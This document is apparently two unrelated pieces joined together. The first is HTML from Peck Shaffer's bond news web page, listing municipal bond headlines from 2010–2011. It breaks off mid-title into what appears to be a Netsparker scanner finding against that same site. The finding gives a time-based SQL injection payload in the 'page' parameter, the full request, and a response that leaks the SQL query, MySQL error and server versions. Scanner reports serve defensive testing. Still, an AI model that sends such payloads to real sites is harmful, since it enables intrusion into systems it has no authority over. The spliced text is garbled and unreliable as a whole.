<li><a href="/contact.php" title="Contact Us"><img src="/media/images/contact_us.gif" alt="Contact Us" title="Contact Us" /></a></li>
<li><a href="/home.php" title="Home"><img src="/media/images/home.gif" alt="Home" title="Home" /></a></li>
</ul>
</form>
</div>
</div>
<!-- Header : End -->
<!-- Body : Start -->

<h1><a href="home.php" title="Peck Shaffer"><span>Peck Shaffer</span></a></h1>
<!-- Nav : Start -->
<script type="text/javascript">
<!--
// Define Images
var aab_off = new Image();
var aab_over = new Image();

var about_off = new Image();
var about_over = new Image();

var people_off = new Image();
var people_over = new Image();

var services_off = new Image();
var services_over = new Image();

var offices_off = new Image();
var offices_over = new Image();

var news_off = new Image();
var news_over = new Image();

var careers_off = new Image();
var careers_over = new Image();

// Set Paths

aab_off.src = '/media/images/nav_aab_over.gif';
aab_over.src = '/media/images/nav_aab_over.gif';

about_off.src = '/media/images/nav_about_us.gif';
about_over.src = '/media/images/nav_about_us_over.gif';

people_off.src = '/media/images/nav_our_people.gif';
people_over.src = '/media/images/nav_our_people_over.gif';

services_off.src = '/media/images/nav_our_services.gif';
services_over.src = '/media/images/nav_our_services_over.gif';

offices_off.src = '/media/images/nav_offices.gif';
offices_over.src = '/media/images/nav_offices_over.gif';

news_off.src = '/media/images/nav_news.gif';
news_over.src = '/media/images/nav_news_over.gif';

careers_off.src = '/media/images/nav_careers.gif';
careers_over.src = '/media/images/nav_careers_over.gif';
-->
</script>

<div id="mainNav">
<ul>
<li><a href="/bonds.php?page=types" title="All About Bonds" onmouseover="rollover('aab','over')" onmouseout="rollover('aab','off')"><img src="/media/images/nav_aab_over.gif" alt="All About Bonds" title="All About Bonds" id="aab"/></a></li>
<li><a href="/about.php" title="About Us" onmouseover="rollover('about','over')" onmouseout="rollover('about','off')"><img src="/media/images/nav_about_us.gif" alt="About Us" title="About Us" id="about"/></a></li>
<li><a href="/people.php" title="Our People" onmouseover="rollover('people','over')" onmouseout="rollover('people','off')"><img src="/media/images/nav_our_people.gif" alt="Our People" title="Our People" id="people"/></a></li>
<li><a href="/services.php" title="Our Services" onmouseover="rollover('services','over')" onmouseout="rollover('services','off')"><img src="/media/images/nav_our_services.gif" alt="Our Services" title="Our Services" id="services"/></a></li>
<li><a href="/offices.php" title="Offices" onmouseover="rollover('offices','over')" onmouseout="rollover('offices','off')"><img src="/media/images/nav_offices.gif" alt="Offices" title="Offices" id="offices"/></a></li>
<li><a href="/news.php" title="News" onmouseover="rollover('news','over')" onmouseout="rollover('news','off')"><img src="/media/images/nav_news.gif" alt="News" title="News" id="news"/></a></li>
<li><a href="/careers.php" title="Careers" onmouseover="rollover('careers','over')" onmouseout="rollover('careers','off')"><img src="/media/images/nav_careers.gif" alt="Careers" title="Careers" id="careers"/></a></li>
</ul>
<div id="thisAd">THIS IS AN ADVERTISEMENT.</div>
</div>

<!-- Nav : End -->
<script type="text/javascript">
<!--
/* define images */
var relatedNews = new Image();
var relatedNews_over = new Image();

var relatedEvents = new Image();
var relatedEvents_over = new Image();

var relatedArticles = new Image();
var relatedArticles_over = new Image();

var relatedSpeeches = new Image();
var relatedSpeeches_over = new Image();

var relatedArchive = new Image();
var relatedArchive_over = new Image();

var imgSignup = new Image();
var imgSignup_over = new Image();

/* set image paths */
relatedNews.src = '/media/images/bonds/news.gif';
relatedNews_over.src = '/media/images/bonds/news_over.gif';

relatedEvents.src = '/media/images/bonds/events.gif';
relatedEvents_over.src = '/media/images/bonds/events_over.gif';

relatedArticles.src = '/media/images/bonds/articles.gif';
relatedArticles_over.src = '/media/images/bonds/articles_over.gif';

relatedSpeeches.src = '/media/images/bonds/speeches.gif';
relatedSpeeches_over.src = '/media/images/bonds/speeches_over.gif';

relatedArchive.src = '/media/images/bonds/archive.gif';
relatedArchive_over.src = '/media/images/bonds/archive_over.gif';

imgSignup.src = '/media/images/news/sign_up.gif';
imgSignup_over.src = '/media/images/news/sign_up_over.gif';

-->
</script>

<!-- Bond_news : Start -->

<div id="secBar">
<div class="containWidth">

<script type="text/javascript"><!-- // define images var bondTypes_off = new Image(); var bondTypes_over = new Image(); var bondNews_off = new Image(); var bondNews_over = new Image(); var bondTool_off = new Image(); var bondTool_over = new Image(); var bondLinks_off = new Image(); var bondLinks_over = new Image(); var bondMap_off = new Image(); var bondMap_over = new Image(); // set image paths bondTypes_off.src = '/media/images/bond_types.gif'; bondTypes_over.src = '/media/images/bond_types_over.gif'; bondNews_off.src = '/media/images/bond_news_over.gif'; bondNews_over.src = '/media/images/bond_news_over.gif'; bondTool_off.src = '/media/images/bond_toolbox.gif'; bondTool_over.src = '/media/images/bond_toolbox_over.gif'; bondLinks_off.src = '/media/images/bond_links.gif'; bondLinks_over.src = '/media/images/bond_links_over.gif'; bondMap_off.src = '/media/images/deal_map.gif'; bondMap_over.src = '/media/images/deal_map_over.gif';--></script><div id="secNav"> <ul> <li><a href="/bonds.php?page=types" title="Bond Types" onmouseover="rollover('bondTypes','over')" onmouseout="rollover('bondTypes','off')"><img src="/media/images/bond_types.gif" alt="Bond Types" title="Bond Types" id="bondTypes"/></a></li> <li><a href="/bonds.php?page=news" title="Bond News &amp; Events" onmouseover="rollover('bondNews','over')" onmouseout="rollover('bondNews','off')"><img src="/media/images/bond_news_over.gif" alt="Bond News &amp; Event" title="Bond News &amp; Event" id="bondNews"/></a></li> <li><a href="/bonds.php?page=toolbox" title="Bond Toolbox" onmouseover="rollover('bondTool','over')" onmouseout="rollover('bondTool','off')"><img src="/media/images/bond_toolbox.gif" alt="Bond Toolbox" title="Bond Toolbox" id="bondTool"/></a></li> <li><a href="/bonds.php?page=links" title="Bond Links" onmouseover="rollover('bondLinks','over')" onmouseout="rollover('bondLinks','off')"><img src="/media/images/bond_links.gif" alt="Bond Links" title="Bond Links" id="bondLinks"/></a></li> <li><a href="/bonds_map.php" title="Deals On The Map" onmouseover="rollover('bondMap','over')" onmouseout="rollover('bondMap','off')"><img src="/media/images/deal_map.gif" alt="Deals On The Map" title="Deals On The Map" id="bondMap"/></a></li> </ul></div>
</div>
</div>

<div id="mainContent">
<div id="Pattern" class="printOnly">
<img src="/media/images/printpages/tile06.gif" title="Pattern" alt="Pattern" id="Pattern" />
</div>
<div id="container">
<div id="border">
<div id="Color" class="color"></div>
<div class="narrative">

<div id="Related" class="Center">
<a href="/bonds.php?page=news#News" title="News" onmouseover="rollover('relatedNews','over')" onmouseout="rollover('relatedNews','')"><img src="/media/images/bonds/news.gif" alt="News" title="News" id="relatedNews"/></a><img src="/media/images/bonds/red_dot.gif" alt="-" class="Dot"/><a href="/bonds.php?page=news#Articles" title="Publications" onmouseover="rollover('relatedArticles','over')" onmouseout="rollover('relatedArticles','')"><img src="/media/images/bonds/articles.gif" alt="Publications" title="Publications" id="relatedArticles"/></a> </div>

<h3>Bond News &amp; Events</h3>

<a name="News"></a>
<h5>News</h5>
<div class="Items">
<h6><a href="/bonds.php?NewsID=138&page=news" title="New National Bond Financing Program for Catholic Educational Institutions through the Colorado Educational and Cultural Facilities Authority">New National Bond Financing Program for Catholic Educational Institutions through the Colorado Educational and Cultural Facilities Authority</a></h6>


<span>2/4/2011</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=137&page=news" title="Housing Bonds Not Affected by Sunset for Exceptions for Federal Guarantees and AMT Exclusions">Housing Bonds Not Affected by Sunset for Exceptions for Federal Guarantees and AMT Exclusions</a></h6>


<span>12/22/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=136&page=news" title="Tax Bill Signed – But Several Muni Finance Provisions Not Extended">Tax Bill Signed – But Several Muni Finance Provisions Not Extended</a></h6>


<span>12/20/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=135&page=news" title="Peck Shaffer Participates in Three Bond Buyer Deals of the Year">Peck Shaffer Participates in Three Bond Buyer Deals of the Year</a></h6>


<span>12/15/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=131&page=news" title="Reminder: New SEC Amendments Effective December 1, 2010">Reminder: New SEC Amendments Effective December 1, 2010</a></h6>


<span>11/12/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=134&page=news" title=""Issue Date" of Draw-Down Loans">"Issue Date" of Draw-Down Loans</a></h6>


<span>11/30/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=130&page=news" title="SEC Begins Securing Civil Penalties Against Individual Municipal Officials for Misleading Financial Disclosures">SEC Begins Securing Civil Penalties Against Individual Municipal Officials for Misleading Financial Disclosures</a></h6>


<span>11/5/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=126&page=news" title="Decades-old Program Gains New Life">Decades-old Program Gains New Life</a></h6>


<span>10/10/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=125&page=news" title="Increased Internal Revenue Service Scrutiny of Build America Bonds De Minimis Premium Rule">Increased Internal Revenue Service Scrutiny of Build America Bonds De Minimis Premium Rule</a></h6>


<span>10/7/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=122&page=news" title="AMENDMENT 60, AMENDMENT 61 AND PROPOSITION 101 - Cause for Fiscal Uncertainty in Colorado's Future">AMENDMENT 60, AMENDMENT 61 AND PROPOSITION 101 - Cause for Fiscal Uncertainty in Colorado's Future</a></h6>


<span>7/9/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=120&page=news" title="SEC Amendments to Rule 15c2-12">SEC Amendments to Rule 15c2-12</a></h6>


<span>6/11/2010</span>



</div>
<div class="Items">
<h6><a href="/bonds.php?NewsID=119&page=news" title="IRS Proposes Revised Compliance Quest..
Database Error Message

Database Error Message
1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /bonds.php

/bonds.php

http://www.peckshaffer.com/bonds.php?page=%27;WAITFOR%20DELAY%20%270:0:25%27--

Parameters

Parameter Type Value
page GET ';WAITFOR DELAY '0:0:25'--

Request

GET /bonds.php?page=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.peckshaffer.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:47:38 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 359
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bonds : Start -->

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--' LIMIT 1' at line 1 | 1064<BR>sql: SELECT DISTINCT(AboutusID) FROM aboutus WHERE IsActive='y' AND AboutusTitle LIKE 'bond ';WAITFOR DELAY '0:0:25'--' LIMIT 1